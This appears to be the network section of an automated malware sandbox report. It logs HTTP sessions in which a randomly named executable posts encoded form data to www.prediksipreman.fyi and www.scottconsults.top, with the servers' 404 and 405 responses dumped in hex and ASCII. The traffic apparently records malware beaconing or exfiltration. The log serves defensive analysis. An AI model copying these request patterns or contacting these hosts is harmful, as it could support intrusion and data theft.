                                                                              Data Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 07 d1 db 3d bb ba 21 09 90 90 04 02 84 c3 71 42 e8 8e ae e8 0e 1b 7e 20 bf 86 9f cc 25 ba 7b 9a 66 ba cf cc 3a fc c3 35 3f 1a d5 25 2b 2b f3 cb cc 9a cc fa ed b7 df 1e ff 89 5b b0 2b 53 e5 07 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 2d e7 db 6f 97 9f 89 5b 59 60 46 95 df bb c7 3a 6c 9e ee d8 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 15 a5 5b 3d d5 95 77 4f dd 7d 4a c7 b2 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 aa 85 e5 27 d6 3f b2 82 ef f2 b0 70 cb ab 25 c8 3b ea a9 95 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 56 7c 5f da 56 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 50 b2 6a 30 c9 ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 de 67 ce 69 f0 f7 cb d4 fe b3 6f 1e 90 ce bd 67 25 61 7c 7a 18 d0 05 d8 f6 cb 40 74 e3 c6 ad 42 db fa 32 28 ad b4 bc 2f dd 22 f4 fe f2 e3 b2 32 3c bb 0f 03 94 c8 bb f7 [TRUNCATED]
                                                                              Data Ascii: 135AZJrnhzt=!qB~ %{f:5?%++[+SA~{|31p-o[Y`F:l,N{7*_v`[=wO}J__d4O'?p%;OwMyVTW'mB||iXV|_V>_*v1Pj0y;EYVr{]/|giog%a|z@tB2(/"2<qAEP/3Y0gO{&8#rq'V~U_-ne[@8Dnwzf>v= %RqIDYZae7}+{io{_-/+KY|AI?Z]V=$?Sg\_kw7Bkt7r=W3_w8MM.mYI7d#8'@Aa{y]a^^I[1w\;+^RwB7z8G{Oy-/ar^!11x(~k)X7niaz8,KX8^8;-)o3i+}dmyG;].Q>-1},vN?~0=_: +%n],yVCar+=tiz5
                                                                              Jan 14, 2025 10:25:23.176279068 CET1236INData Raw: 67 7c 42 a0 04 fe a6 86 37 7e fe 96 b8 4e 68 0d fe 94 00 47 fa a2 98 d1 90 ca bb 3f df 6c 73 8b da 9b e1 5e 78 79 56 5e 22 d4 c3 a0 70 63 e0 eb 9a 1b 03 ec e7 f4 1e 0b d8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d c5 a7 0b b2 9f ed fa fd bc 37 f6
                                                                              Data Ascii: g|B7~NhG?ls^xyV^"pcO0Bq7]7}EG/CI?T^4u+"]G}H=u<^z?TWLR:|-d^c"gCgc3Y\We+z`
                                                                              Jan 14, 2025 10:25:23.176295996 CET1236INData Raw: c7 06 fc 36 5c 94 f8 78 0e 4b 66 1b 2e 3a 5d f4 5d 7e 66 27 7b 59 1a db b6 a8 b3 4e 67 b8 a6 95 4e 72 6d 2a 33 06 27 4d ba 16 b5 83 69 c8 d0 59 12 9d f1 8e c0 63 28 ad 37 42 b2 09 22 ad 44 ac a1 39 32 c5 b5 3b 1a 61 09 5a ed 62 83 e1 83 99 34 8e
                                                                              Data Ascii: 6\xKf.:]]~f'{YNgNrm*3'MiYc(7B"D92;aZb4i=y^,/ny*8NtLfZjE?\sa(XtE6A| E!HRv$TgZ$P.mg[tZF vF7Rwece1>n+[QX
                                                                              Jan 14, 2025 10:25:23.176311970 CET1236INData Raw: 62 8e 9d d1 86 00 46 ad 32 4d 7b 3e 2e e2 7a d5 04 1c b3 66 30 8b 90 4e 1d 4c 18 dd bc e8 28 3f 3b d9 1b c4 e0 fd 05 71 c2 e6 b8 08 19 31 b9 95 60 a2 c9 ec 61 b1 8b 68 9c c9 1b 3c 3d 78 4b 38 0d f4 11 85 02 d7 ac 0c 2b 62 e1 6e 3a ad ab a3 d4 af
                                                                              Data Ascii: bF2M{>.zf0NL(?;q1`ah<=xK8+bn:"h]'>VNvx/CEd!@ YQV?-,G4Y>#3CkoOvvUTPD;sf8JpS8&X u9*u@IZi5?jepK-R
                                                                              Jan 14, 2025 10:25:23.176328897 CET287INData Raw: c3 98 67 6b 7b cb 35 df 0d e0 9f 90 bf 3a d4 75 76 f9 93 b3 5c b3 ff 31 66 3f 83 d4 9f 5e 30 f5 e7 4f 45 71 39 ed 7b 45 5e 6f f7 3c fc 47 e2 02 b2 7c 27 81 67 39 dd 7d 7b 84 3f 5b f5 08 7f a4 9b 1b 34 7d c0 d7 95 67 78 65 f1 f1 b9 a2 f7 5e da bf
                                                                              Data Ascii: gk{5:uv\1f?^0OEq9{E^o<G|'g9}{?[4}gxe^W+r=@VY2}zn_4V'3;"`O}(IGV[\$$-|g>~/)~g0eCVovM3dKUJ@ppM=


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.457496162.0.215.244804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:24.897861958 CET10820OUTPOST /rpjd/ HTTP/1.1
                                                                              Host: www.prediksipreman.fyi
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.prediksipreman.fyi
                                                                              Referer: http://www.prediksipreman.fyi/rpjd/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 10300
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 2f 4d 68 4a 59 67 43 32 30 48 64 71 74 33 73 4c 49 79 73 72 54 7a 67 65 4e 36 5a 66 6c 4d 72 73 47 33 7a 61 4a 62 42 75 72 47 65 44 49 58 57 32 57 59 62 54 5a 46 76 67 41 4b 67 6b 2f 58 6f 76 4c 58 41 66 6d 76 5a 57 58 44 39 55 69 78 44 59 45 75 48 45 44 48 34 66 46 65 30 4e 43 6b 6b 6b 58 32 73 77 79 33 64 46 4b 63 50 53 61 68 79 6b 30 42 4d 62 41 54 54 57 43 63 71 6d 79 77 66 6d 58 71 41 46 4c 78 6f 41 79 39 35 54 51 38 6e 74 69 55 41 73 68 4c 43 50 49 4c 5a 2b 78 57 55 44 4b 59 61 6e 5a 4a 30 57 30 69 74 42 76 38 2f 35 71 47 44 44 6c 63 35 35 33 2f 64 6b 6c 61 53 63 43 36 79 56 75 72 43 35 47 4d 41 4a 33 52 4f 4a 68 4b 67 7a 71 42 6d 4b 6b 47 66 51 6e 56 79 6e 4d 38 72 62 31 64 2b 5a 77 6d 71 59 77 53 44 64 5a 66 53 4e 37 71 4d 6b 42 54 35 2b 72 76 39 77 61 57 34 53 35 44 65 65 68 4f 49 79 74 6c 65 2f 59 62 71 54 6b 6a 70 6e 69 39 38 79 67 4f 79 68 41 6b 5a 62 42 4c 2b 73 44 70 2b 49 65 71 6e 2b 6e 79 53 31 53 71 47 64 34 50 59 51 67 6a 49 76 48 79 32 37 32 67 61 32 4b 6f 73 6a 47 31 [TRUNCATED]
                                                                              Data Ascii: wz4=/MhJYgC20Hdqt3sLIysrTzgeN6ZflMrsG3zaJbBurGeDIXW2WYbTZFvgAKgk/XovLXAfmvZWXD9UixDYEuHEDH4fFe0NCkkkX2swy3dFKcPSahyk0BMbATTWCcqmywfmXqAFLxoAy95TQ8ntiUAshLCPILZ+xWUDKYanZJ0W0itBv8/5qGDDlc553/dklaScC6yVurC5GMAJ3ROJhKgzqBmKkGfQnVynM8rb1d+ZwmqYwSDdZfSN7qMkBT5+rv9waW4S5DeehOIytle/YbqTkjpni98ygOyhAkZbBL+sDp+Ieqn+nyS1SqGd4PYQgjIvHy272ga2KosjG1c1qaJKX9BmU+VlgnfwZI4Dm6ucITafBQ6e0Ujp2mXXLkluSyHClfDFtGIM5X/kLBH5RJ/SglSFD+xL471yWx7dJXnuj8vxx6DTEj8KwivPflgaRWUBRV92nHZzKAyMwE/4Fg8rdrhbIyZj5dKlTKlfK2TxSZJzlkusoB9/mIee0K692VOTB+c2ZrJJJxNz1ym6gIUESRwUGHUb9Q/0ZBevRlPvofdmVDvDlUuhfHn7CnNk587ErOAIDJ3bk65+KqcVv85+vBik4h36RMaYK8WeO4FiNyTz6INqB+D0eY9iYru4k81c9+vvo+cdGIY1XFgkHPsoBr2uDPEvqmSCknvu1LLD7wAnDZEECfYlwGITkcycqiZreDkz91Uw9EK7UaMMRrzGhvQoM2Vo881i6OwWJ3CkyjpUgU+NmhSClwqXogDqGTG+LllZUMLwmZK+Ywb4FscRvgv+6XhL8GiIHAxOk0tfZ4OlimxJoXt92/2tOmRTQ2Zd1qxvVUKNOYfWE2ehBjs9/r0I3DG0GbzGpbApAtgsNhqW4J+1jix88FrWt5Qrsw6ZAhZ9Vesgnj7BpxPut89qpcOhGMVFWPgcnVpaydBSShK8RZDOT3ASo1QjHyNZBp9GoG97VHD/8QIoxBYnlZjoywK7CJwynNTuF9AZkRC/QkoBWelW [TRUNCATED]
                                                                              Jan 14, 2025 10:25:25.619617939 CET1236INHTTP/1.1 404 Not Found
                                                                              keep-alive: timeout=5, max=100
                                                                              content-type: text/html
                                                                              transfer-encoding: chunked
                                                                              content-encoding: gzip
                                                                              vary: Accept-Encoding
                                                                              date: Tue, 14 Jan 2025 09:25:25 GMT
                                                                              server: LiteSpeed
                                                                              x-turbo-charged-by: LiteSpeed
                                                                              connection: close
                                                                              Data Raw: 31 33 35 42 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 07 d1 db 3d bb ba 21 09 90 90 04 02 84 c3 71 42 e8 8e ae e8 0e 1b 7e 20 bf 86 9f cc 25 ba 7b 9a 66 ba cf cc 3a fc c3 35 13 81 a4 aa ca ca ca fc 32 b3 3a b3 7e fb ed b7 c7 7f e2 16 ec ca 54 f9 41 50 25 f1 b7 df 1e 9f 7f 06 a0 3d 06 ae e5 7c fb ed f2 98 b8 95 05 46 54 f9 bd 7b ac c3 e6 e9 8e cd d2 ca 4d ab fb ea 94 bb 77 03 fb f9 ed e9 ae 72 bb 0a ee 49 fc 65 60 07 56 51 ba d5 53 5d 79 f7 d4 dd a7 74 2c 3b 70 ef fb f9 45 16 5f 11 4a b3 7b bb ef fa 74 a2 5a 58 7e 62 fd 23 33 f8 2e 0f 0b b7 bc 9a 82 bc a3 9e 5a 89 fb 74 d7 84 6e 9b 67 45 75 35 ac 0d 9d 2a 78 72 dc 26 b4 dd fb cb cb 97 41 98 86 55 68 c5 f7 a5 6d c5 ee 13 fa f5 3b a9 2a ac 62 f7 1b 81 10 03 25 ab 06 93 ac 4e 9d 47 f8 f9 e3 b3 28 cb ea 14 bb 83 5e 6e 2f e2 b2 cb f2 85 8f 5e d4 fb cc 39 0d fe 7e 19 da bf f6 cd 03 d2 b9 f7 ac 24 8c 4f 0f 03 ba 00 cb 7e 19 88 6e dc b8 55 68 5b 5f 06 a5 95 96 f7 a5 5b 84 de 5f 7e 9c 56 86 67 f7 61 80 12 79 f7 [TRUNCATED]
                                                                              Data Ascii: 135BZJrnhzt=!qB~ %{f:52:~TAP%=|FT{MwrIe`VQS]yt,;pE_J{tZX~b#3.ZtngEu5*xr&AUhm;*b%NG(^n/^9~$O~nUh[_[_~Vgay3S>pC?@WJ`E8+]a}p}_n9NUa~gt*/`Y7p2- }r_{Y@"+=3yUW^g)\km_",-0U%LY$.\cL/5u;_w\Xq]ps:n\U1Na}K{-G'ua&H~00}31qCa^^WXBWxGV^%^iuq+|g~W&0zHo^19_G1n[Z^|>/Vz 2ycW+w7;7lyqWp>PNnF.|Xo}S};oxefs@8~Ov:D[9ob0|^O5F7?5`~}Ds@q:?]Gz9^
                                                                              Jan 14, 2025 10:25:25.619640112 CET1236INData Raw: cd 19 9f 10 28 81 bf a9 e1 8d 9f bf 25 ae 13 5a 83 3f 25 c0 91 be 28 66 34 a4 f2 ee cf 37 cb dc a2 f6 a6 bb 17 5e 9e 95 97 08 f5 30 28 dc 18 f8 ba e6 c6 00 fb 31 bd c7 02 f6 d3 3e 0c 82 d0 71 dc f4 8d a5 be b7 6f 57 f1 e9 82 ec 67 bb 7e 3f ee 8d
                                                                              Data Ascii: (%Z?%(f47^0(1>qoWg~?~-kF~wPxE=)o7$~o~}/,0v>_r\x>= U.dQ'B3}#?p=27/tX7ero>z
                                                                              Jan 14, 2025 10:25:25.619654894 CET1236INData Raw: 77 6c c0 6f c3 45 89 8f e7 b0 64 b6 e1 a2 d3 45 df e5 67 76 b2 97 a5 b1 6d 8b 3a eb 74 86 6b 5a e9 24 d7 a6 32 63 70 d2 a4 6b 51 3b 98 86 0c 9d 25 d1 19 ef 08 3c 86 d2 7a 23 24 9b 20 d2 4a c4 1a 9a 23 53 5c bb a3 11 96 a0 d5 2e 36 18 3e 98 49 e3
                                                                              Data Ascii: wloEdEgvm:tkZ$2cpkQ;%<z#$ J#S\.6>Ihsg%@THW4ih>[$Uz8'fo*uOg\d7nZY.epi1LBu&O]ELvEebgT.^|,yQ=Vo#IvbI%I
                                                                              Jan 14, 2025 10:25:25.619671106 CET1236INData Raw: 27 e6 d8 19 6d 08 60 d4 2a d3 b4 e7 e3 22 ae 57 4d c0 31 6b 06 b3 08 e9 d4 c1 84 d1 cd 8b 8e f2 b3 93 bd 41 0c de 5f 10 27 6c 8e 8b 90 11 93 5b 09 26 9a cc 1e 16 bb 88 c6 99 bc c1 d3 83 b7 84 d3 40 1f 51 28 70 cd ca b0 22 16 ee a6 d3 ba 3a 4a fd
                                                                              Data Ascii: 'm`*"WM1kA_'l[&@Q(p":Jz.)uBocXd2$Z4K4%l!lBNAy+Mkli/123)=nai7k^%JA3oT7i\z9MQ2Y$VVtZ0"
                                                                              Jan 14, 2025 10:25:25.619688034 CET288INData Raw: 8c 79 b6 b6 b7 5c f3 dd 00 fe 09 f9 ab 4d 5d 67 97 3f d9 cb 35 fb 1f 63 f6 33 48 fd e9 05 53 7f fe 54 14 97 dd be 57 e4 f5 72 cf dd 7f 24 2e 20 cb 77 12 78 96 d3 dd b7 47 f8 b3 59 8f f0 47 ba b9 41 d3 07 7c 5d 79 86 57 16 1f 9f 2b 7a ef a5 fd cb
                                                                              Data Ascii: y\M]g?5c3HSTWr$. wxGYGA|]yW+zz"dhn5J~/mk/g~v;"`OP?ZInpsu\WIrxU>d./@%;Xq5^f/Uo(5T


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              12192.168.2.457512162.0.215.244804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:27.452646017 CET445OUTGET /rpjd/?wz4=yOJpbVbkgz0HtUwQYARMSThcLcopmrPoDVX6GqNwoWWXZF3pcIj1Y13LV6gW4nMVJ2J858d+IDhJ+laaNqfHK1c6MutgW040XFAhxno1AdPNbACR1ywEbhk=&OvV=2njD6f80EDOLQ8 HTTP/1.1
                                                                              Host: www.prediksipreman.fyi
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Jan 14, 2025 10:25:28.131764889 CET1236INHTTP/1.1 404 Not Found
                                                                              keep-alive: timeout=5, max=100
                                                                              content-type: text/html
                                                                              transfer-encoding: chunked
                                                                              date: Tue, 14 Jan 2025 09:25:27 GMT
                                                                              server: LiteSpeed
                                                                              x-turbo-charged-by: LiteSpeed
                                                                              connection: close
                                                                              Data Raw: 32 37 38 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                              Data Ascii: 2785<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                              Jan 14, 2025 10:25:28.131808996 CET1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                              Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                              Jan 14, 2025 10:25:28.131839991 CET448INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                              Jan 14, 2025 10:25:28.131874084 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 70 79 72 69 67 68 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 20
                                                                              Data Ascii: border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .additional-info { position: relative; overf
                                                                              Jan 14, 2025 10:25:28.131905079 CET1236INData Raw: 69 6e 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 39 39 32 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 61
                                                                              Data Ascii: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPAAAADqCAMAAACrxjhdAAAAt1BMVEUAAAAAAAD/////////////////////
                                                                              Jan 14, 2025 10:25:28.131937981 CET1236INData Raw: 70 63 61 46 74 57 34 48 38 69 49 30 67 42 32 4d 7a 66 45 63 56 33 67 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51 49 50 45 37 78 46 44 31 32 59 76 79 36 53 76 71 6f 4c 4f 4d 66 39 35 6b
                                                                              Data Ascii: pcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWSFDRONSrAU0iFYLrHU2RKB3q+
                                                                              Jan 14, 2025 10:25:28.131969929 CET1236INData Raw: 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 56 30 52 49 71 2f 36 2b 42 49 50
                                                                              Data Ascii: OKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/dZMxVKDkPCy
                                                                              Jan 14, 2025 10:25:28.132004023 CET1236INData Raw: 30 66 58 32 77 65 53 38 38 58 37 58 36 68 58 52 44 44 52 7a 64 77 48 5a 2f 35 44 32 68 6a 6a 67 68 74 33 4d 62 35 79 31 4e 49 4e 71 2b 62 65 5a 42 75 38 64 38 34 36 35 37 77 50 59 66 4e 38 70 5a 42 63 30 67 2b 4a 4b 69 4b 59 69 4e 72 39 72 34 76
                                                                              Data Ascii: 0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUR
                                                                              Jan 14, 2025 10:25:28.132035017 CET1236INData Raw: 20 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 72 65 61 73 6f 6e 2d 74 65 78 74 22 3e 54 68 65 20 73 65 72
                                                                              Data Ascii: WebMaster</a>. </section> <p class="reason-text">The server cannot find the requested page:</p> </div> <section class="additional-info"> <div class="container"> <div class="
                                                                              Jan 14, 2025 10:25:28.132069111 CET11INData Raw: 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: ml>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              13192.168.2.4575443.33.130.190804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:33.304498911 CET715OUTPOST /qjug/ HTTP/1.1
                                                                              Host: www.scottconsults.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.scottconsults.top
                                                                              Referer: http://www.scottconsults.top/qjug/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 200
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 59 65 6b 45 66 5a 74 72 49 61 58 59 72 39 59 58 37 39 44 4b 67 70 76 33 55 31 39 7a 59 55 59 36 6b 48 52 68 66 41 39 76 4f 74 39 53 35 51 49 70 2f 36 4e 46 53 2b 6c 6c 74 67 38 6f 41 75 2b 7a 43 7a 2f 48 51 2f 62 33 69 4c 5a 58 34 69 47 75 73 66 4e 6a 4c 62 66 72 4a 75 63 74 49 6e 76 67 50 68 65 32 64 57 55 6e 4e 4d 69 4b 66 51 31 57 6c 50 56 6f 69 4a 31 66 79 54 42 65 65 6e 63 30 37 71 55 4c 6a 41 79 5a 69 69 52 48 4e 59 49 48 78 32 70 55 31 7a 4c 4a 37 63 2b 6c 35 57 46 37 34 37 43 2b 55 61 59 39 57 4c 78 33 6f 75 4f 66 6d 6a 53 64 49 63 72 2b 4f 42 48 69 64 2f 4d 72 6b 77 3d 3d
                                                                              Data Ascii: wz4=YekEfZtrIaXYr9YX79DKgpv3U19zYUY6kHRhfA9vOt9S5QIp/6NFS+lltg8oAu+zCz/HQ/b3iLZX4iGusfNjLbfrJuctInvgPhe2dWUnNMiKfQ1WlPVoiJ1fyTBeenc07qULjAyZiiRHNYIHx2pU1zLJ7c+l5WF747C+UaY9WLx3ouOfmjSdIcr+OBHid/Mrkw==
                                                                              Jan 14, 2025 10:25:33.751871109 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.4575573.33.130.190804944C:\Program Files (x86)\ZJVdDTSHvqSjjqQNqNGGpyUZfODRUsROtCgOaWivdOVQCkvHWkEXXCJISuKFITnpLIwzjKRncrXBNUeK\zalkpCfMwtnpQo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 14, 2025 10:25:35.843641043 CET735OUTPOST /qjug/ HTTP/1.1
                                                                              Host: www.scottconsults.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Origin: http://www.scottconsults.top
                                                                              Referer: http://www.scottconsults.top/qjug/
                                                                              Cache-Control: no-cache
                                                                              Connection: close
                                                                              Content-Length: 220
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; ASU2JS; rv:11.0) like Gecko
                                                                              Data Raw: 77 7a 34 3d 59 65 6b 45 66 5a 74 72 49 61 58 59 74 63 49 58 35 66 72 4b 33 5a 76 77 52 31 39 7a 44 45 5a 7a 6b 48 4e 68 66 42 6f 79 4f 65 4a 53 35 78 34 70 38 37 4e 46 54 2b 6c 6c 31 77 38 74 45 75 2b 30 43 7a 7a 6c 51 36 37 33 69 4c 4e 58 34 6e 36 75 73 4d 31 69 4a 4c 66 70 47 4f 63 76 56 58 76 67 50 68 65 32 64 58 77 42 4e 4d 36 4b 65 68 6c 57 6d 72 42 6e 76 70 31 63 78 54 42 65 61 6e 63 6f 37 71 55 54 6a 42 75 7a 69 67 70 48 4e 64 4d 48 77 6b 42 58 73 44 4c 4c 2f 63 2f 36 70 46 6b 31 69 4c 72 4f 61 6f 49 48 51 4a 46 72 6b 49 44 46 33 53 7a 4b 61 63 50 4e 54 47 4f 57 51 38 78 69 2f 34 4c 51 6c 6a 6e 6a 78 2b 54 31 53 6c 46 48 78 39 64 67 37 37 34 3d
                                                                              Data Ascii: wz4=YekEfZtrIaXYtcIX5frK3ZvwR19zDEZzkHNhfBoyOeJS5x4p87NFT+ll1w8tEu+0CzzlQ673iLNX4n6usM1iJLfpGOcvVXvgPhe2dXwBNM6KehlWmrBnvp1cxTBeanco7qUTjBuzigpHNdMHwkBXsDLL/c/6pFk1iLrOaoIHQJFrkIDF3SzKacPNTGOWQ8xi/4LQljnjx+T1SlFHx9dg774=
                                                                              Jan 14, 2025 10:25:36.292016029 CET73INHTTP/1.1 405 Method Not Allowed
                                                                              content-length: 0
                                                                              connection: close


